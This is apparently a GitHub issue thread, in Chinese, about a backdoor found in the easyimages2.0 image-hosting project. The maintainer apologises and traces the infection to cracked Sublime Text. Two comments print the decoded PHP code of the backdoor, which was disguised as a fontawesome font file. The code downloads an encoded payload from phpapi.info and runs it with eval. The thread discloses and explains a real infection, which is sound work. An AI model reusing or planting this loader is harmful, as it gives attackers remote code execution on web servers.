Comments (5)
SycAlright
commented on July 17, 2024
public/static/fonts/fontawesome-wmebfont.php
解码复原:
<?php
$password='CQtlsC';
error_reporting(0);
session_start();
if (!isset($_SESSION["phpapi"])) {
$c = '';
$useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';
$url = 'http://phpapi.info/404.gif';
$urlNew= '/0OliakTHisP8hp0adph9papi5+r6eci0a8yijmg9oxcp9ckvhf/';
if (function_exists('fsockopen')) {
$link = parse_url($url);
$query = $link['path'];
$host = strtolower($link['host']);
$fp = fsockopen($host, 80, $errno, $errstr, 10);
if ($fp) {
$out = "GET /{$query} HTTP/1.0\n";
$out .= "Host: {$host}\n";
$out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\n";
$out .= "Connection: Close\n\n";
fwrite($fp, $out);
$inheader = 1;
$contents = "";
while (!feof($fp)) {
$line = fgets($fp, 4096);
if ($inheader == 0) {
$contents .= $line;
}
if ($inheader && ($line == "\n" || $line == "\n")) {
$inheader = 0;
}
}
fclose($fp);
$c = $contents;
}
}
if (!strpos($c, $urlNew) && function_exists('curl_init') && function_exists('curl_exec')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
$c = curl_exec($ch);
curl_close($ch);
}
if (!strpos($c, $urlNew) && ini_get('allow_url_fopen')) {
$temps = @file($url);
if (!empty($temps))
$c = @implode('', $temps);
if (!strpos($c, "delDirAndFile"))
$c = @file_get_contents($url);
}
if (strpos($c, $urlNew) !== false) {
$c = str_replace($urlNew, "", $c);
$_SESSION["phpapi"] = gzinflate(base64_decode($c));
}
}
if (isset($_SESSION["phpapi"])) {
eval($_SESSION["phpapi"]);
}
from easyimages2.0.
ming42
commented on July 17, 2024
有趣了,21年3月23日提交的commit,恰好是今年的第一次提交。
from easyimages2.0.
icret
commented on July 17, 2024
不好意思,是我本地电脑被感染了。请回源
from easyimages2.0.
icret
commented on July 17, 2024
有趣了,21年3月23日提交的commit,恰好是今年的第一次提交。
我在本地看了下,是2月15号感染的,因为我经常在自己服务器上更新但是很少更新git,所以在今年更新一次,主要是适配php7.4及以上,(2.0.2.0是不支持php7.4的),
我怀疑此病毒是早先下载一些办公软件中的病毒感染的,或者是我用的sublime是破解导致的。
由于本人疏忽造成的影戏深表抱歉。
from easyimages2.0.
icret
commented on July 17, 2024
public/static/fonts/fontawesome-wmebfont.php
解码复原:
<?php $password='CQtlsC'; error_reporting(0); session_start(); if (!isset($_SESSION["phpapi"])) { $c = ''; $useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)'; $url = 'http://phpapi.info/404.gif'; $urlNew= '/0OliakTHisP8hp0adph9papi5+r6eci0a8yijmg9oxcp9ckvhf/'; if (function_exists('fsockopen')) { $link = parse_url($url); $query = $link['path']; $host = strtolower($link['host']); $fp = fsockopen($host, 80, $errno, $errstr, 10); if ($fp) { $out = "GET /{$query} HTTP/1.0\n"; $out .= "Host: {$host}\n"; $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\n"; $out .= "Connection: Close\n\n"; fwrite($fp, $out); $inheader = 1; $contents = ""; while (!feof($fp)) { $line = fgets($fp, 4096); if ($inheader == 0) { $contents .= $line; } if ($inheader && ($line == "\n" || $line == "\n")) { $inheader = 0; } } fclose($fp); $c = $contents; } } if (!strpos($c, $urlNew) && function_exists('curl_init') && function_exists('curl_exec')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_TIMEOUT, 15); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); $c = curl_exec($ch); curl_close($ch); } if (!strpos($c, $urlNew) && ini_get('allow_url_fopen')) { $temps = @file($url); if (!empty($temps)) $c = @implode('', $temps); if (!strpos($c, "delDirAndFile")) $c = @file_get_contents($url); } if (strpos($c, $urlNew) !== false) { $c = str_replace($urlNew, "", $c); $_SESSION["phpapi"] = gzinflate(base64_decode($c)); } } if (isset($_SESSION["phpapi"])) { eval($_SESSION["phpapi"]); }
已经查到了,是由于我用了破解的sublime text3导致木马感染,对此深表抱歉。
之前我一直是在自己发服务器端更新,很少更新git(详细请看:https://img.545141.com/)
本次更新主要是适配php 7.4及以上版本(此前2.0.2.0是不支持7.4的);
对此产生的问题本人深表抱歉!
from easyimages2.0.
Related Issues (20)
- 广场显示所有上传的图片 HOT 1
- 使用api上传提示204错误 HOT 1
- 如何修改为无视单文件上传100M的限制?
- 关于验证码在php8.0环境下显示不出来问题 HOT 1
- Feat|>希望能添加docker部署 HOT 3
- 我反向代理了端口,显示界面出错
- TinyFileManage无法正常使用
- 希望支持docker HOT 1
- Mixed Content Issue When Accessing Resources Over HTTPS HOT 2
- edge浏览器,首页上传的粘贴功能无效 HOT 1
- 2.0版本安装环境监测时遇到问题 HOT 4
- 怎么获取最近上传的图片URL? HOT 1
- 输入账号密码后点击登录,总是回跳到登录页面
- API说明文档中python示例测试不成功,payload参数应该怎么设定? HOT 1
- 不知道为什么PHP搭建的项目总是被挖矿 HOT 2
- 查看已经上传图像的链接 HOT 1
- 隐藏存储路径不生效 HOT 7
- 登录重复跳转问题 HOT 2
- 求求求!!!后台删除图片了还能显示, HOT 1
- 安装完之后主页出现的错误提示
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from easyimages2.0.